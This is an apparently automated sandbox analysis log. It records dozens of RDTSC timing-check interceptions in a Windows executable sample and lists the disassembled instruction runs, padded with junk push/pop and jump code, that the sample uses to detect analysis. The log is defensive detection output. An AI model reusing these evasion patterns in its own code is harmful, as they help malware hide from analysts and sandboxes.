Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554EC0 second address: 554ECE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554ECE second address: 554ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55518E second address: 5551A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5BC10A35FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5551A4 second address: 5551B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5551B4 second address: 5551C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jno 00007F5BC10A35F6h 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5551C8 second address: 5551FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5BC10B70A3h 0x0000000a pushad 0x0000000b jmp 00007F5BC10B709Ch 0x00000010 jmp 00007F5BC10B709Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55533D second address: 555368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10A3601h 0x00000008 jmp 00007F5BC10A35FDh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555368 second address: 55536E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555639 second address: 555643 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555643 second address: 555647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555773 second address: 555777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555777 second address: 5557A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B709Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F5BC10B709Ch 0x00000011 jno 00007F5BC10B7096h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F5BC10B709Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557A8 second address: 5557AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557AC second address: 5557B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557B2 second address: 5557B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557B8 second address: 5557C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B709Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557C6 second address: 5557F1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5BC10A35F6h 0x00000008 jmp 00007F5BC10A35FBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5BC10A3604h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557F1 second address: 5557F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555F99 second address: 555F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5544CF second address: 554505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b jmp 00007F5BC10B70A9h 0x00000010 je 00007F5BC10B709Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554505 second address: 554509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BE93 second address: 55BEAB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5BC10B7096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5BC10B709Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BEAB second address: 55BEB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BEB0 second address: 55BECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 jmp 00007F5BC10B709Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F5BC10B70AAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BECE second address: 55BED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BED2 second address: 55BED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568AD4 second address: 568ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568ADC second address: 568B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F5BC10B7096h 0x0000000c popad 0x0000000d jc 00007F5BC10B70ABh 0x00000013 jmp 00007F5BC10B709Fh 0x00000018 jg 00007F5BC10B7096h 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007F5BC10B7096h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568B0C second address: 568B1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568B1A second address: 568B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568B21 second address: 568B31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5BC10A35FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56880C second address: 56881F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5BC10B709Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56881F second address: 568823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568823 second address: 568829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56C7EE second address: 56C80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5BC10A3608h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56C80C second address: 56C816 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10B7096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56C97A second address: 56C980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 57BDB2 second address: 57BDEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007F5BC10B7096h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F5BC10B70A8h 0x00000014 jmp 00007F5BC10B70A1h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58353E second address: 583544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583544 second address: 583549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583699 second address: 5836A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F5BC10A35F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58396D second address: 583973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583973 second address: 58397D instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58397D second address: 583984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583984 second address: 5839A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5BC10A35FBh 0x0000000f jng 00007F5BC10A35F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583D7D second address: 583D83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583D83 second address: 583D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583D88 second address: 583DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5BC10B7096h 0x0000000a popad 0x0000000b jmp 00007F5BC10B70A7h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F5BC10B7096h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58992A second address: 58992E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58992E second address: 589934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 589620 second address: 58963A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F5BC10A35F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58963A second address: 58963E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 593455 second address: 59345A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 59345A second address: 593465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5BC10B7096h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 596726 second address: 596740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F5BC10A35F6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 je 00007F5BC10A35F6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5998B2 second address: 5998B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5998B6 second address: 5998C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5998C0 second address: 5998CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 59E786 second address: 59E790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BC10A35F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 59E790 second address: 59E7B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 59BC23 second address: 59BC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10A35FEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5AB47D second address: 5AB4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F5BC10B70A7h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F5BC10B709Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5AB5E0 second address: 5AB5EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C43D1 second address: 5C43D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47A6 second address: 5C47D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35F6h 0x00000008 jmp 00007F5BC10A3600h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F5BC10A3604h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47D8 second address: 5C47DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47DE second address: 5C47EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5BC10A35F6h 0x0000000a je 00007F5BC10A35F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47EE second address: 5C47F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47F2 second address: 5C47F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47F8 second address: 5C4804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4946 second address: 5C494C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C494C second address: 5C4951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4951 second address: 5C4959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4C96 second address: 5C4CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5BC10B709Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4E4C second address: 5C4E70 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e jmp 00007F5BC10A3602h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4E70 second address: 5C4E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4E76 second address: 5C4E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4E7A second address: 5C4E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C6C91 second address: 5C6C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C6C95 second address: 5C6C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C6C9B second address: 5C6CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C6CA4 second address: 5C6CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A9h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F5BC10B7096h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5CB018 second address: 5CB02F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5BC10A35FEh 0x0000000c push edx 0x0000000d pop edx 0x0000000e jo 00007F5BC10A35F6h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5CD006 second address: 5CD026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5BC10B709Ch 0x0000000c jmp 00007F5BC10B709Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5CD026 second address: 5CD041 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BC10A35FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C009A second address: 50C00A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0E80 second address: 50A0ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10A3601h 0x00000009 or esi, 1E79E526h 0x0000000f jmp 00007F5BC10A3601h 0x00000014 popfd 0x00000015 mov esi, 7A4F6657h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F5BC10A35FAh 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 mov dx, si 0x00000029 mov edx, ecx 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0ED0 second address: 50A0ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0ED4 second address: 50A0EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0EDA second address: 50A0EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0EE0 second address: 50A0EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F012C second address: 50F0149 instructions: 0x00000000 rdtsc 0x00000002 mov bh, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F5BC10B709Eh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
